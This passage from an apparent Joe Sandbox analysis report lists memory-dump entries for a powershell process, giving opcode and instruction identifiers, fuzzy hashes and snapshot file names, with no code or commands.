                                                                                      • Opcode Fuzzy Hash: 9fbc0b9c2f85546082733b9c74fa6f673f382da9e2a93cb7f0ed79f7b025c57a
                                                                                      • Instruction Fuzzy Hash: D4318030318C1C4FDBA8FE1DE849E6577D1FB9832171151AAE45EC7366DE21EC928780
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000020.00000002.2679555626.00007FF7C08A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C08A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_32_2_7ff7c08a0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b6bba2ab3bb5837555771a8fef6fdb682bfd9f56e402d78712c9ba43fdd86973
                                                                                      • Instruction ID: 1c0b3b16f6329820d122170700b78d58edaec8e030fc92de75ce470ec3a593ed
                                                                                      • Opcode Fuzzy Hash: b6bba2ab3bb5837555771a8fef6fdb682bfd9f56e402d78712c9ba43fdd86973
                                                                                      • Instruction Fuzzy Hash: E2314A306059098FD7A4EF6CD858A99B7E1FF4832175511AAE89AC7771DB20ECD1CBC0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000020.00000002.2679555626.00007FF7C08A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C08A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_32_2_7ff7c08a0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: fa4c0664b7c3364104edb3f70192090df090f807b32b3cb7ee11bdfba73ca3f7
                                                                                      • Instruction ID: 8e8d52a358a7156114c3bf543f381f2c6efd1e0c7ba8da9b5a0c90de453de424
                                                                                      • Opcode Fuzzy Hash: fa4c0664b7c3364104edb3f70192090df090f807b32b3cb7ee11bdfba73ca3f7
                                                                                      • Instruction Fuzzy Hash: 0421A230628E088FCB98EF2CC985A65B7E1FF5831534505ADD48AC7AA2CB24FC41CB40
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000020.00000002.2679555626.00007FF7C08A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C08A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_32_2_7ff7c08a0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: da9ca36f151b58da1681fb96db2dcc9808b424178b40a9d5f6f7d7ea6daffdf5
                                                                                      • Instruction ID: 8d1a9e862233d1708f2b9b30c44f574f059b5aabebde748700c83e99c70b3f96
                                                                                      • Opcode Fuzzy Hash: da9ca36f151b58da1681fb96db2dcc9808b424178b40a9d5f6f7d7ea6daffdf5
                                                                                      • Instruction Fuzzy Hash: 5211C03070CC1C4FD7A8EB1DE858AA577D1EB98721B1141AAF45DC7366CE21EC9287C0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000020.00000002.2679555626.00007FF7C08A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C08A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_32_2_7ff7c08a0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 394d92217ffe29abde6c64f7dcc06c2e0d5b86fd91e5e57dccda6fa264bfbb3f
                                                                                      • Instruction ID: 32658e8d08dfedc92888989cddb5c05fd5c1a4c539f0ec064d5837c89409e9bd
                                                                                      • Opcode Fuzzy Hash: 394d92217ffe29abde6c64f7dcc06c2e0d5b86fd91e5e57dccda6fa264bfbb3f
                                                                                      • Instruction Fuzzy Hash: 0511423160D8485FDB95EB2CDC989647FE1EF5A31234605E7D489CB272DA15EC81C750
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000020.00000002.2679555626.00007FF7C08A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C08A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_32_2_7ff7c08a0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1dc0b67e1247fb507d465dd653c162e100744c1b44778b9d98fb538fd0ee62b7
                                                                                      • Instruction ID: 7abc036f28f264329a04a1e401c36b7d98f443d95539f573dc996139a0e26483
                                                                                      • Opcode Fuzzy Hash: 1dc0b67e1247fb507d465dd653c162e100744c1b44778b9d98fb538fd0ee62b7
                                                                                      • Instruction Fuzzy Hash: 5F21723050CA894FDB55EB28C854F61BBE1EF9A310F4940E9D48DCB2A3DA25FC92CB50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000020.00000002.2679555626.00007FF7C08A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C08A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_32_2_7ff7c08a0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 222b87a84ae4006f65f9d8b9832e0083fe192572dd7134040ad75c12512bfc05
                                                                                      • Instruction ID: e197e827e3c8427c89a7130b5cf6beb8819794330edb313eb85b792b26f60e76
                                                                                      • Opcode Fuzzy Hash: 222b87a84ae4006f65f9d8b9832e0083fe192572dd7134040ad75c12512bfc05
                                                                                      • Instruction Fuzzy Hash: D011883160CA484FC721BB249C508E6BFE5EF86320B0441ABD41EC7392DA68B966C7E1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000020.00000002.2679555626.00007FF7C08A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C08A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_32_2_7ff7c08a0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 347162c43ec05f6591ca2cebf67c308aff8a9fc05d909e19d374e0aa6b9ebd72
                                                                                      • Instruction ID: 996b6045f969c13f1d24367c603d092e9ef16e0ca041c3521d71301a17991919
                                                                                      • Opcode Fuzzy Hash: 347162c43ec05f6591ca2cebf67c308aff8a9fc05d909e19d374e0aa6b9ebd72
                                                                                      • Instruction Fuzzy Hash: 82110B3150DA850FD356BB7458166A5FFE0EF42170F4942FAC499CB293DF1CB84683A1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000020.00000002.2679555626.00007FF7C08A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C08A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_32_2_7ff7c08a0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ba214b4c4c7023011f7bf7546b99c51a6074b317134efc9521b13e9d866523e0
                                                                                      • Instruction ID: 2392ad6648aa496bfb4b0eec14df56c6f52b9737585af36b1e577c4e43ca53b9
                                                                                      • Opcode Fuzzy Hash: ba214b4c4c7023011f7bf7546b99c51a6074b317134efc9521b13e9d866523e0
                                                                                      • Instruction Fuzzy Hash: CE01262175D78A0FD354AFBD6C96261BBD4EF5A21574960BAD888C3282EA50E81083D5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000020.00000002.2679555626.00007FF7C08A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C08A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_32_2_7ff7c08a0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                      • Instruction ID: 0eb73c8a9aefaf2beab6fde2fcf01d826cf746fa66318a46a0f0f8ba8d88afb4
                                                                                      • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                      • Instruction Fuzzy Hash: 0C01843010CB0C4FD744EF0CE051AA6B7E0FB85360F10052DE58AC3651D622E891CB45
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000020.00000002.2679555626.00007FF7C08A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C08A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_32_2_7ff7c08a0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c755cf7e248f85c02c36c5c45a487ff13189a685a05aad69857f334ce0d4a9d2
                                                                                      • Instruction ID: 629e6fd7ec49c4cd8ac834417ef87d3b9925d86402872fa97a8157df3d780428
                                                                                      • Opcode Fuzzy Hash: c755cf7e248f85c02c36c5c45a487ff13189a685a05aad69857f334ce0d4a9d2
                                                                                      • Instruction Fuzzy Hash: 78F05031B58A1F0B92A4ACAD6CCA63177C8EB581207446039E80DC3350FD50FC0143D4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000020.00000002.2679555626.00007FF7C08A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C08A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_32_2_7ff7c08a0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d2187cb2d8137b69e2f6815fa34b256c9162a98d7a333ec75ec84b7e9dca547d
                                                                                      • Instruction ID: df2dc9e8189dbc7703fb5b14df9edc95fbf41496747a1a0af25657c179f83237
                                                                                      • Opcode Fuzzy Hash: d2187cb2d8137b69e2f6815fa34b256c9162a98d7a333ec75ec84b7e9dca547d
                                                                                      • Instruction Fuzzy Hash: 1CF0F67661990D9BDB00AB69EC145D8FBE0FFC9329F08006AE41DC3291DB66A865C399
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000020.00000002.2680989432.00007FF7C0970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0970000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_32_2_7ff7c0970000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 03fbec49de1575c9575300468d7871dcb2d2be7e299cc91bd1172f1c1bab547d
                                                                                      • Instruction ID: e3a0560a38659f61c8a7c2fd75e4b17090b444f395b3aa356634cd0295f2525e
                                                                                      • Opcode Fuzzy Hash: 03fbec49de1575c9575300468d7871dcb2d2be7e299cc91bd1172f1c1bab547d
                                                                                      • Instruction Fuzzy Hash: A521515290E7C51FE3575B7858696A4BFB0AF57620B4E41EBC088CF1A3D60D28898362